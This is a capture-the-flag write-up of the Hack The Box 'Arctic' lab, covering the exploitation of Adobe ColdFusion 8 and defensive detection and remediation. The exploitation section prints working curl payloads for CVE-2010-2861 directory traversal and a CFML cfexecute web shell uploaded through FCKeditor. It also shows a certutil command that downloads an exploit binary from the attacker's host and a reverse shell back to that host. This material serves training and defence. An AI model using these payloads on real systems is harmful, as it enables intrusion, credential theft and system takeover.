Skip to content
Back to all posts

HTB: Arctic

· 16 min easy Windows Arctic

Adobe ColdFusion 8 on Windows Server 2008 R2 yields unauthenticated RCE through a three-part chain: directory traversal for credential extraction, FCKeditor file upload, and LFI-based CFML code injection. MS10-059 escalates to SYSTEM when JuicyPotato fails.

#htb #coldfusion #windows #directory-traversal #privilege-escalation

Overview

Arctic runs Adobe ColdFusion 8.0.1 on Windows Server 2008 R2 SP0, with the ColdFusion JRun web server listening on port 8500. Every HTTP request takes 30 to 60 seconds to respond, which shapes the entire engagement.

The standard exploitation path for ColdFusion 8 uses the administrator’s scheduled task feature to download a JSP shell. On this target, the scheduled task URL field is broken (possibly due to the server’s Greek locale), requiring an alternative approach. The chain I use combines three vulnerabilities: a directory traversal (CVE-2010-2861) that extracts the admin password hash, an unauthenticated FCKeditor file upload, and an LFI that includes the uploaded file into a CFML template, causing ColdFusion to execute embedded <cfexecute> tags. This last step is less commonly documented than the scheduled task approach but bypasses the need for admin panel access entirely.

Privilege escalation uses MS10-059 (Chimichurri) because the more common JuicyPotato fails in the cfexecute process context despite the service account holding SeImpersonatePrivilege.

Reconnaissance

I start with a service-version scan:

nmap -sC -sV -A -T4 -oA scans/arctic 10.129.15.232
PortServiceProduct / VersionNotes
135MSRPCMicrosoft Windows RPCStandard Windows service
8500fmtp?JRun Web ServerColdFusion application server
49154MSRPCMicrosoft Windows RPCDynamic RPC endpoint

Nmap does not fingerprint JRun on port 8500. Browsing to http://10.129.15.232:8500/ reveals a directory listing with CFIDE/ and cfdocs/, immediately identifying Adobe ColdFusion. The admin panel is accessible at /CFIDE/administrator/.

ComponentVersion
Operating SystemWindows Server 2008 R2 SP0 x64 (6.1.7600)
Web ServerJRun Web Server (ColdFusion built-in)
ApplicationAdobe ColdFusion 8.0.1
LocaleGreek (el)

Attack Surface Analysis

ColdFusion 8 exposes several default administrative paths:

  • /CFIDE/administrator/: admin login panel (enter.cfm)
  • /CFIDE/scripts/ajax/FCKeditor/: bundled FCKeditor with file upload
  • /cfdocs/: ColdFusion documentation

The FCKeditor file manager connector accepts unauthenticated POST requests. Uploaded files are stored in /userfiles/file/. Executable extensions (.cfm, .jsp, .cfc) are blocked, but .txt files are permitted.

CVEDescriptionStatus
CVE-2010-2861Directory traversal in locale parameterExploited
MS10-059Kernel privilege escalation (KB982799 missing)Exploited
FCKeditorUnauthenticated file upload (.txt only)Exploited

Vulnerability Analysis

CVE-2010-2861: directory traversal

The locale parameter on /CFIDE/administrator/enter.cfm loads localisation resource files. The parameter is concatenated into a file path without sanitisation. Directory traversal sequences (../) navigate to arbitrary files, and a null byte (%00) truncates the path extension. The included content renders into the page’s <title> tag.

Critically, this is not merely a file read. ColdFusion’s template engine processes CFML tags in the included content. This transforms file read into code execution when the included file contains CFML markup.

FCKeditor unauthenticated upload

ColdFusion 8 bundles FCKeditor with an upload connector that requires no authentication. The connector blocks executable extensions (.cfm, .jsp) but permits .txt uploads. Alone, this is a medium-severity finding. Combined with the LFI, it becomes the code execution vector.

AttributeValue
CVECVE-2010-2861
CVSS v39.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWECWE-22 (Path Traversal), CWE-94 (Code Injection)
Root causeUnsanitised locale parameter + CFML template inclusion
MITRE ATT&CKT1190 (Exploit Public-Facing Application)

Exploitation

Step 1: Extract the admin password hash

curl -s "http://10.129.15.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en" \
  | grep -o '<title>[^<]*</title>'
<title>password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
rdspassword=0IA/F1WR9X3UwihR45hLaf..
</title>

ColdFusion 8 stores passwords as unsalted SHA-1. The hash cracks instantly:

echo -n "happyday" | sha1sum
# 2f635f6d20e3fde0c53075a84b68fb07dcec9b03  -

Step 2: Upload CFML shell via FCKeditor

cat > shell.txt << 'EOF'
<cfexecute name="cmd.exe" arguments="/c #URL.c#"
  timeout="10" variable="output"></cfexecute>
<cfoutput>#output#</cfoutput>
EOF

curl -s -F "[email protected]" \
  "http://10.129.15.232:8500/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/"

Response code 0 indicates success. The file is accessible at /userfiles/file/shell.txt.

Step 3: LFI + CFML injection for RCE

The LFI includes shell.txt into enter.cfm. ColdFusion processes the <cfexecute> tags during page rendering:

curl -s "http://10.129.15.232:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/wwwroot/userfiles/file/shell.txt%00en&c=whoami" \
  | grep -o '<title>[^<]*</title>'
<title>arctic\tolis
</title>

RCE confirmed as arctic\tolis. The command output appears in the <title> tag because the LFI inclusion point is within the HTML <head>.

Step 4: Privilege escalation via MS10-059

System enumeration reveals Windows Server 2008 R2 build 7600 with zero hotfixes. The tolis account has SeImpersonatePrivilege, but JuicyPotato fails because cfexecute spawns child processes in a restricted 32-bit context without COM object access.

MS10-059 (Chimichurri) targets a kernel vulnerability in the Tracing Feature for Services. The x86 binary is required because ColdFusion 8 runs 32-bit Java under WoW64:

# Upload via certutil
curl -s "...&c=certutil+-urlcache+-split+-f+http://10.10.14.110:8080/ms.exe+C:\Windows\Temp\ms.exe"

# Execute (with listener on attacker: ncat -lvnp 4444)
curl -s "...&c=C:\Windows\Temp\ms.exe+10.10.14.110+4444"
C:\ColdFusion8\runtime\bin> whoami
nt authority\system

Post-Exploitation

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix"
# OS Name:     Microsoft Windows Server 2008 R2 Standard
# OS Version:  6.1.7600 N/A Build 7600
# Hotfix(s):   N/A

whoami /priv
# SeChangeNotifyPrivilege    Enabled
# SeImpersonatePrivilege     Enabled
# SeCreateGlobalPrivilege    Enabled

Zero hotfixes. The RTM release with no service packs or updates. Every component is beyond end-of-life: ColdFusion 8 (released 2009), JRun (discontinued), FCKeditor (replaced by CKEditor in 2009).

Defensive Analysis

Detection opportunities

PhaseMITRE ATT&CKDetection
Initial accessT1190Web logs: locale parameter containing ../ or %00
CredentialT1552.001Web logs: LFI targeting password.properties
ExecutionT1059.003Process monitoring: cmd.exe spawned by jrun.exe
Privilege esc.T1068Sysmon: executable in C:\Windows\Temp\ spawned by Java
Defence evasionT1036Sysmon: certutil used as download cradle

Web server logs: Requests where the locale parameter exceeds 30 characters or contains traversal sequences (../, %2e%2e) are high-fidelity indicators. The same applies to POST requests to the FCKeditor upload connector.

Process monitoring: cmd.exe spawned as a child of jrun.exe or java.exe is anomalous. Executables running from C:\Windows\Temp\ with a Java process as parent should trigger immediate investigation.

certutil abuse: certutil -urlcache -f is a well-known living-off-the-land download technique. Sysmon and EDR tools should flag this command pattern.

Remediation

PriorityActionEffortImpact
P0Decommission: CF8 and Server 2008 R2 are both EOLHighCritical
P1Apply APSB10-18 (Adobe security bulletin for CVE-2010-2861)LowHigh
P1Firewall port 8500 from untrusted networksLowHigh
P2Remove FCKeditor or restrict upload to authenticated usersLowMedium
P2Apply KB982799 (MS10-059)LowMedium
P3Upgrade to current supported versionsHighMedium

No combination of patches will bring this system to a defensible state. Every component is beyond end-of-life with no vendor support. The correct remediation is decommission and rebuild on current software.

Key Takeaways

  1. LFI in CFML templates is code execution, not just file read. ColdFusion’s template engine processes CFML tags in included content. Any writable location (FCKeditor uploads, temp directories, log files) becomes a code execution vector when combined with LFI. The same principle applies to PHP’s include() and JSP’s <jsp:include>.

  2. Architecture matters for exploit binaries. ColdFusion 8 runs 32-bit Java under WoW64 on 64-bit Windows. All child processes inherit the 32-bit context. JuicyPotato x64 fails with an architecture mismatch, and even the x86 build fails because COM objects are inaccessible from the constrained cfexecute context. Always verify the process architecture before uploading binaries.

  3. Slow targets require persistent infrastructure. Arctic’s 30 to 60 second response time means every command takes a full minute. HTTP servers must survive session interruptions (nohup). Plan for latency in your tooling and workflow.

  4. When the standard path is broken, find another. The scheduled task approach (the “standard” ColdFusion 8 exploit) failed because the URL field was broken. The LFI + CFML injection chain achieves the same result through a different mechanism. Flexibility in methodology is more valuable than memorising a single exploit path.